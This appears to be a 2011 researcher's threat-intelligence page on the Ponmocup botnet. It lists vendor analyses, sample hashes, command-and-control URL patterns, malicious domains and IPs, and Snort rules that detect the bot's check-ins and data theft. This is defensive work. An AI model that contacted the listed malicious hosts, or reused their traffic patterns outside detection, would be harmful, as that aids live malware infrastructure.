This page is dedicated to provide a collection of links and details about the Ponmocup malware / botnet. We've discovered several infected hosts and have malware samples, memory dumps (Memorize), C&C traffic details available upon request. Please send comments and questions to: toms.security.stuff -at- gmail.com Work in progress... (created on 2011-05-30 / updated: 2011-06-24)
General links How big is the Ponmocup botnet? www.abuse.ch blog: How Big is Big? Some Botnet Statistics Infection through hacked web servers: website hacked with extra .htaccess in all folders and ROOT folder?? >>> Have you checked your logs for access to these malicious domains / IPs yet? (updated: 2011-06-24) <<< infernomag.com / gtracking.org nastiness Bot Network classification inquiry SOPHOS: Mal/Ponmocup-A (detailed analysis of 3 samples) Malware samples MD5: 820ed1d99e2b771d915e033450fa0b0f bd291073fc2cb39456886d091a5ee85c 593af63840f11883610ba95d6744c4b1 The above analysis shows that binary code is also stored in different registry keys. We were also able to extract such registry "blobs" from infected hosts, some keys lager than 100 KB. This could be (encrypted) malware components. (?) SOPHOS: Troj/Mdrop-CLC ThreatExpert analysis (also shows registry entries) Microsoft MPC: TrojanDownloader:Win32/Ponmocup.A Troublesome Trojan Trammels Torrent Sites (from 2010/11/24 !) The Pirate Bay and Mininova Blocked by Mysterious New Trojan New Trojan Blocks Access To Bittorrent Websites: Webroot Media Site Pimping Malware TrendMicro: TSPY_PIRMINAY.A
C&C traffic details Infection step: URL-pattern: /cgi-bin/r.cgi?p=...&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME} Domain / IP: many domains / IP's of infected servers! * NEW * List of infected- and malware-hosting domains / IPs: HTML / TXT (updated: 2011-06-22) After executing the downloaded .COM-file infector: URL-pattern: /html/license_43EC922...[long hex string].html Domain / IP: checkwebspeed.net / 95.211.8.196 Assumed "phone home", get commands, send stolen data, download further malware... (?) URL-pattern: /images2/BD35...[long hex string].swf Domain / IP: 94.75.234.107, 85.17.139.239, marksandco.net / 94.75.234.98, omniwebpro.org / 94.75.201.35, URL-pattern: /cgi-bin/shopping3.cgi ?a=[long hex string] (request to some other domain with large download -- malware update?) /cgi-bin/unshopping3.cgi ?b=[long hex string] Domain / IP: amegatech.net / 94.75.234.98 URL-pattern: /cgi-bin/rokfeller3.cgi ?v=11 (with long hex string in POST body -- some sample data available) Domain / IP: intermediacorp.org / 85.17.188.195 Here is a list of domains & IPs identified for C2 traffic: omniwebpro.org 94.75.201.35 (first used 2011-03-18) 85.17.139.239 85.17.139.239 (first used 2011-03-17) rapidstream.biz 85.17.139.238 (first used 2011-03-15) intermediacorp.org 85.17.188.195 (first used 2011-03-14) 94.75.201.36 94.75.201.36 (first used 2011-03-11) amegatech.net 94.75.234.98 (first used 2011-03-04) marksandco.net 94.75.234.98 (used from 2010-02-26 to 2011-03-03) inetspeedup.com 94.75.234.98 (first used 2011-02-17) 94.75.234.107 94.75.234.107 (first used 2011-02-12) Domains / IPs used from 2010-02-24 to 2011-02-11 amegatech.net 174.36.82.151 (first used 2011-02-06) inetspeedup.com 174.36.82.151 (first used 2011-01-19) marksandco.net 174.36.82.151 (first used 2010-03-07) 174.36.82.151 174.36.82.151 (first used 2010-03-01) mtuconnectwall.org 174.36.82.151 (used from 2010-02-24 to 2010-10-27) >>> List of malicious domains / IPs <<< (updated: 2011-06-24)
Snort rules http://rules.emergingthreats.net/open-nogpl/suricata/rules/emerging-current_events.rules alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET CURRENT_EVENTS SEO FAKE AV Win32.Ponmocup Checkin"; flow:established,to_server; content:"GET"; http_method; content:"/html/license_"; http_uri; nocase; pcre:"/\/html\/license_[0-9A-F]{550,}\.html/Ui"; classtype:trojan-activity; sid:2011969; rev:7;) alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET CURRENT_EVENTS Possibly Ponmocup Encoded URI Checkins"; flow:established,to_server; content:"/images2/"; nocase; http_uri; pcre:"/^\/images2\/[0-9a-fA-F]{500,}/U"; classtype:trojan-activity; reference:url,malwaresurvival.net/2011/04/21/media-site-pimping-malware/; reference:url,community.websense.com/forums/p/10728/23862.aspx; reference:url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?ThreatID=146443; sid:2012799; rev:2;) alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET CURRENT_EVENTS Possibly Ponmocup Sending Data to Controller"; flow:established,to_server; content:"/cgi-bin/rokfeller3.cgi?v=11"; nocase; http_uri; classtype:trojan-activity; reference:url,malwaresurvival.net/2011/04/21/media-site-pimping-malware/; reference:url,community.websense.com/forums/p/10728/23862.aspx; reference:url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?ThreatID=146443; sid:2012800; rev:2;)
Malware samples The following 3 samples were extracted from infected hosts: ced3103e366d2eeac145639b080b3426 HPZipm12L.dll (VT results 33 / 43) dfe859eda8d9ed88863896ac233b17a9 crtdllo.dll (VT results 16 / 42) 04366dfaa4a7d32066fa6dcda14c9e94 ole32H.dll (VT results 12 / 42) Update: 2011-06-22 current VT detections from 2011-06-22 list fo signature names from AV's
written with the most powerful HTML editor --> vi ;-)